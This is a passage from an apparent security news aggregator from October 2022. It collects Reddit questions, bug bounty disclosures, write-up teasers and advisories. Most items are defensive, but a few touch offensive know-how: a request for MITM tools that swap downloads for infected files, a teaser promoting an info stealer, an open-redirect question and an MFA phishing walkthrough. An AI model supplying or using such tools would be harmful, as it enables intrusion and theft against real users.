take into consideration possible proprietary/company information on the device... Basically - how do you guys handle these situations in your own orgs? Much appreciated! submitted by /u/RhinoDuck [link] [comments]
    Password Managers are overrated Change my mind
    Following is Imo Lets face it, long and clunky passwords are MOSTLY not needed anymore. Why? Well how do security breaches happen? How is someone getting hacked nowdays?Bruteforce? Nope. Social engineering. So why bother with a Password manager and waaay to long passwords for anyone to remember? Alot of sites have 2FA and the rest? Bruteforce Protection, so why would i need to bother with way to long passwords if i can use a relative simple one with special characters? ​ Edit: Ok, i agree with you guys. For me a PM only made sense to me for having long and complicated passwords no one could remember. What didnt crossed my mind, is that it can also be used to store "reasonable passwords" ​ Edit2: I knew my post isnt gonna be popular or that many ppl agree with, thats why i wrote to change my mind, and so i did. But is that a reason to bomb my comments and post? submitted by /u/offron1 [link] [comments]
    Are there MITM malware injection tools for HTTP/HTTPS
    I know about methods and tools for capturing passwords and stealing cookies. Some tools allow on the fly SSL/TLS MITM attacks. Are there ready-made tools to substitute downloads with infected files in real time? For example, change the original PDF with a pre-made infected PDF or replace the ZIP file with an alternative ZIP containing malicious executable files. Thanks! submitted by /u/SecAbove [link] [comments]
    Achieve open redirect in this case:
    Any ideas how to achieve an open redirect in a case like this: --> request: ?return_to=google.com --> response: domain/google.com submitted by /u/rootcherryblossom [link] [comments]
    What to do when the red team member often triggered security alerts?
    Hello, I'm a member of blue team, and often saw many alerts triggered from one red team member. The issue here is that he seemingly "pentested" targets out of scope. When I showed him the log, he said he did nothing at all although the log evidently showed his action with his IP address and his username (like "I went to lunch at that time, blah blah blah). What do you often respond to such case? Thank you. submitted by /u/sanba06c [link] [comments]
    Some references of SSL bumping (or proxy without bumping) in a script?
    I recently confirmed that HTTP proxies can be created with low-cost web hosting. ​ Me HTTP proxy (Python) Web hosting (PHP) On the Web gnh1201/php-httpproxy: HTTP proxy implementation with PHP socket (github.com) ​ Now I want to implement an HTTPS proxy. However, it seems that HTTPS communication is not possible with a way to open the simple socket. ​ I think I need some references on how I can perform SSL bumping. If there is a good reference, I would like to get a recommendation. Thank you. submitted by /u/gnh1201 [link] [comments]
  • Open

    SecWiki News 2022-10-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-06 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Vulnerability Exploitability EXchange – A Guide
    Article URL: https://www.rezilion.com/guides/vulnerability-exploitability-exchange-vex-a-guide/ Comments URL: https://news.ycombinator.com/item?id=33108564 Points: 2 # Comments: 0
  • Open

    Assorted directory (music, TV, NSFW)
    This directory is full of a random assortment of TV episodes and music, as well as numerous large-size NSFW videos. It fairly erratically goes online and offline, and appears to have some kind of throttling in place: https://84.42.206.118/localhost/stash/?C=S&O=A submitted by /u/JiminythecricketinOz [link] [comments]
  • Open

    WordPress Security
    Initially started as a blogging platform has turned into a lifesaver for many startups, companies, influencers, and bloggers. WordPress… Continue reading on InfoSec Write-ups »
    Bugcrowd — Tale of multiple misconfigurations!! ❌
    No content preview
    HTTP-HOST HEADER ATTACKS
    No content preview
    HackTheBox Canvas CTF Writeup
    No content preview
    Try Hack Me: Pickle Rick Walkthrough
    No content preview
    Hacking the WordPress sites for fun and profit | Part-1 [ Water ]
    No content preview
    How to properly enforce authorization
    Introduction Continue reading on InfoSec Write-ups »
    The Day I End-Up finding that Critical Database Info leaking on CM Cell(TN) Application
    No content preview
    Cloud Security Tooling Series : What the heck is a CWPP ?
    Understanding where CWPPs fit in the Cloud Security puzzle Continue reading on InfoSec Write-ups »
  • Open

    WordPress Security
    Initially started as a blogging platform has turned into a lifesaver for many startups, companies, influencers, and bloggers. WordPress… Continue reading on InfoSec Write-ups »
    Bugcrowd — Tale of multiple misconfigurations!! ❌
    No content preview
    HTTP-HOST HEADER ATTACKS
    No content preview
    HackTheBox Canvas CTF Writeup
    No content preview
    Try Hack Me: Pickle Rick Walkthrough
    No content preview
    Hacking the WordPress sites for fun and profit | Part-1 [ Water ]
    No content preview
    How to properly enforce authorization
    Introduction Continue reading on InfoSec Write-ups »
    The Day I End-Up finding that Critical Database Info leaking on CM Cell(TN) Application
    No content preview
    Cloud Security Tooling Series : What the heck is a CWPP ?
    Understanding where CWPPs fit in the Cloud Security puzzle Continue reading on InfoSec Write-ups »
  • Open

    WordPress Security
    Initially started as a blogging platform has turned into a lifesaver for many startups, companies, influencers, and bloggers. WordPress… Continue reading on InfoSec Write-ups »
    Bugcrowd — Tale of multiple misconfigurations!! ❌
    No content preview
    HTTP-HOST HEADER ATTACKS
    No content preview
    HackTheBox Canvas CTF Writeup
    No content preview
    Try Hack Me: Pickle Rick Walkthrough
    No content preview
    Hacking the WordPress sites for fun and profit | Part-1 [ Water ]
    No content preview
    How to properly enforce authorization
    Introduction Continue reading on InfoSec Write-ups »
    The Day I End-Up finding that Critical Database Info leaking on CM Cell(TN) Application
    No content preview
    Cloud Security Tooling Series : What the heck is a CWPP ?
    Understanding where CWPPs fit in the Cloud Security puzzle Continue reading on InfoSec Write-ups »
  • Open

    Cisco Hackery: Configuration File Download
    1.0 Intro Prior to making a career change to offensive security, I spent over 15 years working for a Cisco partner designing and implementing enterprise and VoIP networks. During that time, I performed best practice assessments aimed at identifying misconfigurations that could lead to a network compromise. Today, I have taken that knowledge and used... The post Cisco Hackery: Configuration File Download appeared first on TrustedSec.
  • Open

    Red Team Assessments
    Red Team Engagements are highly targeted assessments designed to take advantage of network sensitive data characteristics by utilising the… Continue reading on Medium »
    fzf — Fuzzy Finder
    fzf é uma ferramenta que disponibiliza um filtro interativo e que pode lhe ajudar muito no dia-a-dia, além de rápida pode ser utilizada em… Continue reading on 100security »
  • Open

    Attack simulation tool based on CVE
    Hi Everyone Hope you all are doing good. I am looking for a CVE based (not malware based) attack simulation tool in order to test my NIPS. So that I can check for which attack it is blocking which is not. Based on that I can create more signature to detect those CVE. Tool can be paid or open source with regular update on CVE and their exploit. Please suggest any tool that will fullfill this requirement. Thanks in advance. submitted by /u/AnyYak5018 [link] [comments]
    Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE)
    submitted by /u/rmccurdyDOTcom [link] [comments]

  • Open

    No rate limit on subscribe form
    Yelp disclosed a bug submitted by happykira0x1: https://hackerone.com/reports/1708824
    IDOR - Delete technical skill assessment result & Gained Badges result of any user
    LinkedIn disclosed a bug submitted by sachin_kumar_: https://hackerone.com/reports/1592587 - Bounty: $1000
    PYTHON: CWE-079 - Add query for email injection
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1602237 - Bounty: $4500
    [JAVA]: Partial Path Traversal
    GitHub Security Lab disclosed a bug submitted by smehta23: https://hackerone.com/reports/1678405 - Bounty: $1800
    [Java]: CWE-625 - Query to detect regex dot bypass
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1690045 - Bounty: $1000
    [CPP]: Add query for CWE-297: Improper Validation of Certificate with Host Mismatch
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1710575 - Bounty: $1800
  • Open

    online tool for steganography and polyglot file creation/detection
    For anyone who may be a pentester, red team or blue team I'd like to ask and get feedback. Realistically, how useful would you find a web service or online tool that allows you to detect or create polyglot files or stego files? submitted by /u/guyWithKeyboards [link] [comments]
    lots of dns requests for higi.com
    20:26:16.861975 IP 177.222.232.141.53 > 10.0.0.149.53: 20991+ [1au] ANY? higi.com. (37) I have tow defferent vps servers on defferent regions, i have a dns servers on both of them, i thousands of requests to higi.com? from Brazillian IPs... on both of them this line from tcpdump on port 53. whats wrong? any help please? submitted by /u/mhmr81 [link] [comments]
    Domain Admin Security Training
    Can anyone recommend any security training (free or paid) that every domain admin should take/watch. submitted by /u/1hTD4eOyCrsJ [link] [comments]
    Wireshark: Security Risks When Installed on a Server?
    In terms of a living off the land attack vector, is having Wireshark installed on a server a significant security risk? submitted by /u/Wsz2020 [link] [comments]
    Do recruiters call back if i missed a call?
    I missed 4 missed calls from a recruiter. One at 12:00 and one at 2:00, I didn’t actually miss them i was at the military base i serve in and touch phones aren’t allowed. I hate myself for not putting my sim in a phone with keys instead. I am so pissed. This is like the 2nd time someone contact me from infosec,and where i live there are no openings for many infosec jobs,and most don’t hire juniors. At one point i am saying that if it’s meant to be,they will call. But should i try messaging the HR on LinkedIn for example or try calling again tomorrow? I called today but they didn’t respond. submitted by /u/Ramseesthe4th [link] [comments]
    What should I use for an SPF record on a defensively parked domain?
    I need an SPF record for a parked domain. Is this what I should be using in this scenario? This domain will not be sending mail. v=spf1 -all Is there a better entry to add? submitted by /u/mtx4gk [link] [comments]
    LockBit 3.0 Ransomware Spam Mail Disguised as a Resume
    Cybersecurity Researchers has released technical detials and indicators of compromise associated with LockBit Ransomware attacks through Case Study. https://blog.criminalip.io/2022/09/23/lockbit-3-0-ransomware/ On Oct 01, 2022, we received an e-mail titled "Regarding Job" and the contents of the email indicated that this was intended as a job application. So here is the questions. Have you ever been hit with ransom? Did you pay the ransom? What's adequate preparation for ransom attack? Actually, we receive over hundred of email job application. So is it possible to prevent ransomware attacks by doing as stated in the case study article? How do you think? submitted by /u/Glad_Living3908 [link] [comments]
  • Open

    What is OSINT?
    OSINT means Open Source Intelligence and it is a means of gathering data. Continue reading on Medium »
    Dedemocratizing social media: the case of Russian Telegram channels
    Social media offers to chance to speak truth to power. I look at a way this has been dealt with by one Russian state-backed news agency. Continue reading on Medium »
  • Open

    TCU Live: 2022OCT04 (latest release)
    The latest version of "TCU Live" (2022OCT04) has been released. It's running the latest Debian sid packages, Linux kernel, and third party packages such as the Tor Browser, checkra1n, volatility, guestmount, git, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
    TCU Passware (2022OCT04)
    The latest "TCU Passware" (2022OCT04) has been released. This live distro automatically initializes the Passware Linux agent and adds it to your Passware cluster. It includes a SSH server (u:user, p:live) so you can login to debug the agent if required. It also has hashcat included so if you stop the Passware Linux agent you can use it for direct hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1BChc2kbErGPOFrDnvC8EO55PIWnuL-vX submitted by /u/atdt0 [link] [comments]
    TCU Hashtopolis (2022OCT04)
    The latest "TCU Hashtopolis" (2022OCT04) has been released. This live distro automatically initializes the Hashtopolis Linux agent and adds it to your Hashtopolis cluster. It includes a SSH server (u:user, p:live) so you can login to debug the agent if required which can be particularly helpful when a Hashtopolis task fails to benchmark your agent and the agent pulls itself out of the cluster. It also has hashcat included so if you stop the Hashtopolis Linux agent you can use it for direct hashcat jobs. See the README.pdf for more info. https://drive.google.com/drive/folders/1xkDBNCr-KBg8FTMvTc70sxm0nr-6qYCG?usp=sharing submitted by /u/atdt0 [link] [comments]
    Wire Transfer Scam w/ AnyDesk
    Good morning, We've recently came across a case where an elderly female was caught in the middle of a scam that consisted of a spoof caller stating that they were from Norton Anti-Virus. Our victim, allowed the user to install "AnyDesk" connection service(s) on their laptop, and phones. They than convinced the victim to do 5 wire transfer transactions totaling $700,000. Obviously I'm sure the suspects behind this were using VPNs, but is there any way to gather IP addresses or data to see whom connected to her devices to begin tracking? submitted by /u/JBettz [link] [comments]
    What is your workflow for IIOC cases?
    What’s everyone’s usually workflow? View extracted images, check internet history for related terms or relevant material, shellbags, link files, recent etc. Is there anything else I can find useful info in? Just curious to what everyone else is doing! submitted by /u/addiosamigo [link] [comments]
    HDD Password Toshiba
    Hello, i have a Toshiba Laptop which HDD i can't image with FTK. Only zeros with Software Writeblocker. With Hardware Writeblocker you don't See the drive. If you boot the system there ist the info: Input HDD password. I think it's a firmware password. Any suggestions? Is there a tool that shows If it is so? submitted by /u/Civil_Structure_1033 [link] [comments]
    Dissect enables you to go from acquisition of thousands of systems to answering the how, when, and what in a matter of hours – A game changer for incident response teams. It’s modular and concise API allows for anyone with Python experience to adapt it to their own needs and create output ..
    submitted by /u/digicat [link] [comments]
  • Open

    Fuzzing Trackmania Nations Forever for RCE
    Article URL: https://blog.bricked.tech/posts/tmnf/part1/ Comments URL: https://news.ycombinator.com/item?id=33099312 Points: 22 # Comments: 0
  • Open

    SecWiki News 2022-10-05 Review
    将ModSecurity内置到java应用实现第一代rasp by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-05 Review
    将ModSecurity内置到java应用实现第一代rasp by ourren 更多最新文章,请访问SecWiki
  • Open

    Vulnerability Exploitability EXchange (Vex) – A Guide
    Article URL: https://www.rezilion.com/guides/vulnerability-exploitability-exchange-vex-a-guide/https://www.rezilion.com/guides/vulnerability-exploitability-exchange-vex-a-guide/ Comments URL: https://news.ycombinator.com/item?id=33096473 Points: 2 # Comments: 1
  • Open

    Cloud Security Tooling — What does a CIEM do exactly ??
    One more cloud abbreviation to understand Continue reading on InfoSec Write-ups »
    Ransomware Attacks — Current Trends and Protection Strategies
    No content preview
    TryHackMe: OhSINT Room Write-Up [No Answers]
    No content preview
  • Open

    Cloud Security Tooling — What does a CIEM do exactly ??
    One more cloud abbreviation to understand Continue reading on InfoSec Write-ups »
    Ransomware Attacks — Current Trends and Protection Strategies
    No content preview
    TryHackMe: OhSINT Room Write-Up [No Answers]
    No content preview
  • Open

    Cloud Security Tooling — What does a CIEM do exactly ??
    One more cloud abbreviation to understand Continue reading on InfoSec Write-ups »
    Ransomware Attacks — Current Trends and Protection Strategies
    No content preview
    TryHackMe: OhSINT Room Write-Up [No Answers]
    No content preview
  • Open

    Fuzzing Trackmania Nations Forever for RCE
    submitted by /u/rdjgr [link] [comments]
    dirsearch - release v0.4.3 - crawling supported
    submitted by /u/maurosoria [link] [comments]
    Pixel 6 bootloader: Emulation, ROP
    submitted by /u/jeandrew [link] [comments]
    A New Supply Chain Attack on PHP
    submitted by /u/Gallus [link] [comments]
    Wireshark 4.0.0 has been released
    submitted by /u/Fugitif [link] [comments]
  • Open

    Ghauri — advanced cross-platform tool
    An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws Continue reading on Medium »
    The Day I End-Up finding that Critical Database Info leaking on CM Cell(TN) Application
    As you have read the title, Yes! Karthikeyan. V the guy who was testing the CM Cell application and fortunately found the tipping point… Continue reading on InfoSec Write-ups »
    How I Found A P1 Bug
    Hi, Continue reading on Medium »
    Hacking the WordPress sites for fun and profit | Part-1 [ Water ]
    Hello folks, I am Krishna Agarwal (Kr1shna 4garwal) from India 🇮🇳. An ordinary bug hunter and So called security researcher :) Continue reading on InfoSec Write-ups »
    OAUTH MISCONFIGURATION LEADS TO PRE ACCOUNT TAKEOVER
    Hello everyone!! ☺️ Continue reading on Medium »
  • Open

    Hacking the WordPress sites for fun and profit | Part-1 [ Water ]
    Hello folks, I am Krishna Agarwal (Kr1shna 4garwal) from India 🇮🇳. An ordinary bug hunter and So called security researcher :) Continue reading on InfoSec Write-ups »
  • Open

    Security Researchers shares Lockbit 3.0 ransomware technical details, defense tips on case study.
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    How to Secure & Harden Your Joomla! Website in 12 Steps
    At Sucuri, we’re often asked how website owners and webmasters can secure their websites. However, advice can often be too broad; different content management systems (CMS) exist in this ecosystem and each require a unique security configuration. That’s exactly why the Sucuri Firewall contains an application profiling engine that adapts to the CMS and regular website traffic patterns to identify signs of a threat. With that in mind, today we’re covering some of the steps to secure a Joomla! Continue reading How to Secure & Harden Your Joomla! Website in 12 Steps at Sucuri Blog.

  • Open

    Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell)
    CVE-2022-41040 and CVE-2022-41082 (aka ProxyNotShell) can be used for remote code execution. Read our analysis and suggestions for how to mitigate. The post Threat Brief: CVE-2022-41040 and CVE-2022-41082: Microsoft Exchange Server (ProxyNotShell) appeared first on Unit 42.
  • Open

    Improving Asset Visibility and Vulnerability Detection on Federal Networks
    Article URL: https://www.cisa.gov/binding-operational-directive-23-01 Comments URL: https://news.ycombinator.com/item?id=33088508 Points: 1 # Comments: 0
  • Open

    I have an interesting virus and looking to stop it
    Lately my PC got infected by a virus. It starts automatically when the pc boots and uses my network, CPU, and memory: it launches a command prompt process and I can see it eating my ressources. In order to fix it I started by blocking the ports that this process is using, and looking forward to compeletly shut it down. any recommendation on how to find out what exactly kicks off that process? and maybe how to remove it or something. Would appreciate any help. (interesting fact, when i open task manager the virus slows down using my pc's ressources and once i close tha task manager it resumes eating my ressources again haha) Thanks submitted by /u/Divarello [link] [comments]
    How is forensic analysis (disk/memory clone) done during an ongoing attack without the attacker knowing?
    In episodes of Darknet Diaries, incident responders often say one of the first things they do is grab an image of the disk and memory on a compromised system. To me it seems like the only way to do this reliably would be an offline/cold clone, but they almost always indicate they do it on the live system. Maybe I’m overestimating the attacker or how advanced malware is, but I’m thinking if I were the attacker I could do things to hide. Detect if any common disk/memory dump tools get run and kill them, interfere with them, or temporarily hide. Add hooks into the OS system calls involved in dumping files/disk/memory, like if you hijack the OS call that lists files, takes a snapshot, or reads system-wide memory outside of your process, then your files and data wouldn’t show up in a dump from a live system. Run some kind of SIEM-style log collection to alert when “indicators of response” are present. Obviously not storing logs, but alerts could still be sent off to the attacker to say something is up. Or are there pressures acting against this? Like, is it the case that there’s a cost to all of these evasive cloaking measures, and if too much is done then they risk raising a red flag? Like maybe laying low is more effective than some super advanced persistence attempt? submitted by /u/PlausibleNinja [link] [comments]
    Is it okay to use the built-in password manager on Android devices? It’s very convenient and works better than Bitwarden, especially when offering to save new passwords.
    Is it okay to use the built-in password manager on Android devices? It’s very convenient and works better than Bitwarden, especially when offering to save new passwords. submitted by /u/Bored-Giraffe [link] [comments]
    Can my employee spy on me or check my location over MS Teams?
    Hello guys. We have a new rule that allows us to work from anywhere in the EU. I thought about traveling around and working from spain, france and greece. My company allowed it but my boss says I shouldnt be too far away in case he needs me. This is a bad excuse since the last time I was in the office was 3 months ago. Even from spain I could be there the next day whenever he calls me but he said I should stay in my own country and travel around. My question is: Would he or the IT department be able to see where I am working from? submitted by /u/Lee63225 [link] [comments]
    Are there any password managers for the browser that supports biometric login on each login and not just the master password?
    I have tried 1password and read the documentation on Bitwarden. I would like to know if there is any password manager that supports using biometric log inlogin each time I try to login and not just the master vault login. submitted by /u/0OOO00000OO00O0O0OOO [link] [comments]
    Migrate to blockchain security or continue on the traditional web?
    I currently work as a security engineer at a startup and around here I have room to develop and grow in terms of blockchain security. But I don't know if that's a certainty for the future, I mean, I don't know how this whole blockchain thing is going to develop in the next few years. I am new and have a short career (2 years) so I come to ask if I should continue studying what I already do (traditional web hacking) or if I should migrate to blockchain security studies. and furthermore, what do you guys think about blockchain security. ​ My biggest motivator for asking this question is because in addition to already being inserted in an environment that uses blockchain, also because great security minds are migrating to this blockchain security market (e.g https://pwnednomore.org/). Thanks. submitted by /u/Born_Barnacle3417 [link] [comments]
  • Open

    Geolocating a Protest in Sweden
    On September 30, 2022 an explosion, reportedly caused by a deliberate attack, inside Kaj Educational Center in the Afghanistan capital of… Continue reading on The Sleuth Sheet »
    CHALLENGE STATUES
    Challenge proposé sur TWITTER le 29/09/2022. Vous trouverez ci-après la correction. Continue reading on Medium »
  • Open

    Dissect: An incident response game-changer
    submitted by /u/CyberMasterV [link] [comments]
    imaging a MacBook...
    I have a client shipping me a Mac tomorrow but we don't have macquisition. I just got my shop to upgrade to Magnet Axiom Cyber but it doesn't seem to do a physical image. I can probably deal with logical if needed. But I was wondering if I could image it with paladin and unlock and process it in Axiom kind of like I used to do when my last shop had Blacklight. Also has anyone tried using the Remo imaging on an external network. They mainly tout using this for internal investigations but we work with clients.. submitted by /u/Inevitable_Logging [link] [comments]
  • Open

    Dissect: An incident response game-changer
    submitted by /u/CyberMasterV [link] [comments]
    pirebok - an adversarial fuzzer
    submitted by /u/c0daman [link] [comments]
    MSSQL, meet Maggie - a novel backdoor for MSSQL servers.
    submitted by /u/OwnPreparation3424 [link] [comments]
    Matano - Open source cloud native security lake built with Arrow2 + Rust
    submitted by /u/shaeqahmed [link] [comments]
    Secure your machine learning with Semgrep
    submitted by /u/Khryse [link] [comments]
  • Open

    Get The Superior Cloud Penetration Testing Services in USA, Israel, And UK
    Today, security professionals use website penetration testing to check the integrity of cyber systems and assets. The testing is essential… Continue reading on Medium »
    Red Teams and Blue Team: True or False Friends?
    Seneca wrote a letter discussing what he felt the word friend meant: Continue reading on Medium »
  • Open

    SecWiki News 2022-10-04 Review
    Serverless安全揭秘:架构、风险与防护措施 by 路人甲 IDOR相关研究 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-04 Review
    Serverless安全揭秘:架构、风险与防护措施 by 路人甲 IDOR相关研究 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    WeFuzz secures seed funding to bring decentralized auditing and bug bounty platform to Web3
    Crowdsourced security audit and bug bounty platform WeFuzz today announced funding from Druid Ventures to advance its fully decentralized… Continue reading on Medium »
    Step 21: SQL Injection Fundamentals
    SQLi my old friend… honestly I’m hopin to run through this module fairly quickly. I did a Udemy course on SQL databases after struggling… Continue reading on Medium »
    Blueshift DEX on the Milkomeda Algorand A1 Testnet
    It’s fair to say that I have always been waiting for a Blueshift integration with any of the top blockchains (outside of Cardano) like… Continue reading on Medium »
    ML Wallet Vulnerability
    Disclaimer: The purpose of this research is to improve and strengthen security all issues discovered in this research are reported to the… Continue reading on Medium »
    Learning Basics: Over The Wire (Bandit -> Level 1 → Level 17)
    I know it’s been way too long, since I wrote an article. I was just too busy with my studies. Anyway, lets jump right in. I started this… Continue reading on Medium »
    Bugcrowd — Tale of multiple misconfigurations!! ❌
    Welcome to this new article. This article is a story about misconfigurations found on a domain. Since it is a private program let’s call… Continue reading on InfoSec Write-ups »
    Interview: PinkDraconian
    Intigriti hacker manager and content creator Continue reading on Medium »
    FFUF Intermediate Part Two
    This is the second part for ffuf usage. In the first part of the tool we have discussed about installation and some basic usage of it. If… Continue reading on Medium »
  • Open

    Prioritize vulnerability assessment more easily with these simple steps— and intelligence—from Secunia Research
    The cost of an exploited vulnerability due to a cyber–attack can be devastating to your business. Your confidential information, intellectual property, and employees are the valuable data points that make up your brand and must be protected.   According to Forbes, cybercrimes are at an all-time high with external hackers being linked to 93 percent of reported cases. Simply focusing on patching the most common vulnerabilities is not enough and can leave you exposed to potential attacks. While running a successful business, it can feel overwhelming and impossible to know everything. However, with Flexera’s software vulnerability management solutions, you don’t have…
  • Open

    Common Conditional Access Misconfigurations and Bypasses in Azure
    Conditional Access is widely used in Azure to prevent unauthorized access. When it works, it can shut down attacks, even if the user’s password is known. However, it doesn’t always work as intended. For this blog post I wanted to provide an in-depth look at common Conditional Access configurations in Azure, along with potential bypasses.... The post Common Conditional Access Misconfigurations and Bypasses in Azure appeared first on TrustedSec.
  • Open

    Phish a User with MFA Enabled
    I took a look at EvilGoPhish and did a walkthrough. I was able to successfully phish my own Office 365 account with the Microsoft authenticator turned on. This is rather mind-blowing that it works and works this well. Take a look at my video if you are interested. Spearphishing a User with MFA Enabled submitted by /u/Infosecsamurai [link] [comments]
    Running Bloodhound on production - risks and considerations
    It's my first post here, hi everyone! I wanted to ask for your advice on running Bloodhound and not tearing the local AD apart. I used BH several times in the past during red teaming (never really broke anything lol), but in my current company we want to run ingestors regularly to fine-tune detection and have some attack paths ready for next exercises. Before we can do it, there needs to be some risk assessment performed with affected hosts and possible threats while running BH on production. Has anyone done anything like it before? How do you guys deal with the risks of running ingestors on production network? I tried reading the docs, but they're not too precise. I'm thinking of doing some labs to determine the impact first, but it's hard to compare a lab to a several-thousand-endpoint domain, right? ;) Please share any tips you have and stay red :) submitted by /u/l0r4q [link] [comments]
  • Open

    Bypass two-factor authentication
    Cloudflare Public Bug Bounty disclosed a bug submitted by ydvanjali: https://hackerone.com/reports/1664974 - Bounty: $250
  • Open

    萌新玩转转存储之Lsass.exe&SAM
    内网信息收集是攻防演练绕不过的坎,其中尤以账号密码/哈希为最。
  • Open

    Radio, Audio, and other stuff
    https://www.wbai.org/audio/ https://www.bibletelling.org/btpress/audio/ https://eaec.org/mp3/ http://www.creative-wisdom.com/radio/ http://media.sbc.sc/ftproot/ https://www.pastorsstudy.org/radio/2008/ https://www.pastorsstudy.org/radio/2009/ ​ https://thesummit.fm/330V1_wav/ The number aftwe the V can be changed from 1 to 6 ​ https://www.roguefolk.bc.ca/media/ https://www.aquarius-publishing.com/RADIO/ http://mesamike.org/radio/mwdx/audio/ https://www.sgo.fi/pub_vlf/ http://otrrlibrary.org/OTRRLib/ https://www.burnttoastvinyl.com/radio/media/ https://www.antp.org.mx/radio/ http://kruljo.radiostudent.si/mp3/ ​ ​ Misc https://www.sgo.fi/pub_vlf/ http://www.princeton.edu/~ssato/ https://www.hueylong.com/audio/ http://gamekill.cz/cstrike/ https://www.mscperu.org/tv_medioscom/ http://www.africa.uga.edu/Kiswahili/doe/media/ https://ftp.txdot.gov/pub/ submitted by /u/ilikemacsalot [link] [comments]

  • Open

    Modifying ettercap Plugin (IEC 60870-5 )
    if any one is quite versed in IEC 60870-5 protocol please dm thanks submitted by /u/CleanCryptographer8 [link] [comments]
    SIEM/Honeypot training environment
    I'm volunteering in an after-school cybersecurity club and wanted to get some teenagers exposed to SIEM and general forensics. I was thinking of running a SecurityOnion instance and honeypot on Amazon and then using that, or would you have any better suggestions? submitted by /u/spokale [link] [comments]
    CIS CSC but for ransomware preparedness
    Hi Reddit, I've conducted several CIS/CSC assessments utilizing the AuditScripts risk register. I'm looking for something similar but more focused on a lightweight BIA for ransomware. Any thoughts? submitted by /u/ruarchproton [link] [comments]
    What is DLL sideloading? A common technique explained
    What is DLL sideloading? A common technique that often relies on signed libraries from popular vendors. We have a new tech explainer on how it works, its benefits for threat actors, and the difference between active and passive exploitation. https://businessinsights.bitdefender.com/tech-explainer-what-is-dll-sideloading submitted by /u/MartinZugec [link] [comments]
    How to Setup SSH on first boot for Kali-Raspberry Pi
    I Don't Have A External Keyboard/Mouse And a Monitor. i want my kali to be accessed via ssh on the first boot since installation on sd card . i saw a video mentioning how to create ssh file and wpa_supplicant.conf file but it was not much informative on how to exactly do that . thank you in advance for helping ! submitted by /u/Kidbu65 [link] [comments]
  • Open

    BlackHat MEA CTF 2022 — Forensic (Mem)
    Introduction Continue reading on Medium »
    CSRF Attack — 0 click account delete - 1st write-up
    I am Deepak, Started bug bounty 5–6 months age, I am noob in this field correct me if you found something wrong in this post. Continue reading on Medium »
    Agent Stealer
    many been asking me for this powerful stealer lately Continue reading on Medium »
    MY FIRST AND SECOND BUGS ARE — 2FA BYPASS
    Hey there guys, Continue reading on Medium »
    API’s Security-All in One
    Hello everyone :) Continue reading on Medium »
    Getting into InfoSec and Cybersecurity
    A shorter, less intimidating list of infosec resources helpful for anyone trying to learn. Continue reading on Medium »
    Open map of sql : Complete Sqlmap quide
    Understanding complete sqlmap tool very easily in just few minutes (can use as Sqlmap cheatsheet). Continue reading on Medium »
    Exploiting Insecure Deserialization for Fun
    Hey squad, let’s Hack! Continue reading on Medium »
    Taebit’s first bug bounty program ended with a success
    Thank you all the AstroNuts 👨‍🚀👩🏻‍🚀🧑🏽‍🚀 Continue reading on Medium »
  • Open

    Fuzzing Solidity Smart Contracts with Echidna: Die-Hard Level Tips
    In this series we will focus only on those aspects that can be really useful for auditing and bug bounty hacking! Continue reading on Pessimistic Security »
  • Open

    Fuzzing Solidity Smart Contracts with Echidna: Die-Hard Level Tips
    In this series we will focus only on those aspects that can be really useful for auditing and bug bounty hacking! Continue reading on Pessimistic Security »
  • Open

    SecWiki News 2022-10-03 Review
    代码检索和摘要中的自监督对比学习 by ourren SecWiki周刊(第448期) by ourren 浅析洞态iast产品 by ourren DeFiHackLabs: Reproduce DeFi hack incidents using Foundry by ourren Awesome-web3-Security: A curated list of web3Security materials and resources by ourren Havoc: 可延展的后渗透远控框架 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-03 Review
    代码检索和摘要中的自监督对比学习 by ourren SecWiki周刊(第448期) by ourren 浅析洞态iast产品 by ourren DeFiHackLabs: Reproduce DeFi hack incidents using Foundry by ourren Awesome-web3-Security: A curated list of web3Security materials and resources by ourren Havoc: 可延展的后渗透远控框架 by ourren 更多最新文章,请访问SecWiki
  • Open

    Reddit talk promotion offers don't expire, allowing users to accept them after being demoted
    Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1656380 - Bounty: $1000
    jira discloser information
    Informatica disclosed a bug submitted by isumitpatel: https://hackerone.com/reports/994612
  • Open

    When Athletic Abilities Just Aren't Enough - Scoreboard Hacking Part 3
    submitted by /u/mdulin2 [link] [comments]
  • Open

    Credential Stuffing Attack: Countermeasures using Patterns and Machine Learning
    No content preview
    ‍$40,000 Bounty, Authentication Bypass Techniques, Cache Poisoning, IDORs, Password Recovery…
    No content preview
    TryHackMe WriteUp: Corridor
    No content preview
    TryHackMe: 0x41haz Room Write-Up [No Answer]
    No content preview
    Orange Arbitrary Command Execution
    No content preview
  • Open

    Credential Stuffing Attack: Countermeasures using Patterns and Machine Learning
    No content preview
    ‍$40,000 Bounty, Authentication Bypass Techniques, Cache Poisoning, IDORs, Password Recovery…
    No content preview
    TryHackMe WriteUp: Corridor
    No content preview
    TryHackMe: 0x41haz Room Write-Up [No Answer]
    No content preview
    Orange Arbitrary Command Execution
    No content preview
  • Open

    Credential Stuffing Attack: Countermeasures using Patterns and Machine Learning
    No content preview
    ‍$40,000 Bounty, Authentication Bypass Techniques, Cache Poisoning, IDORs, Password Recovery…
    No content preview
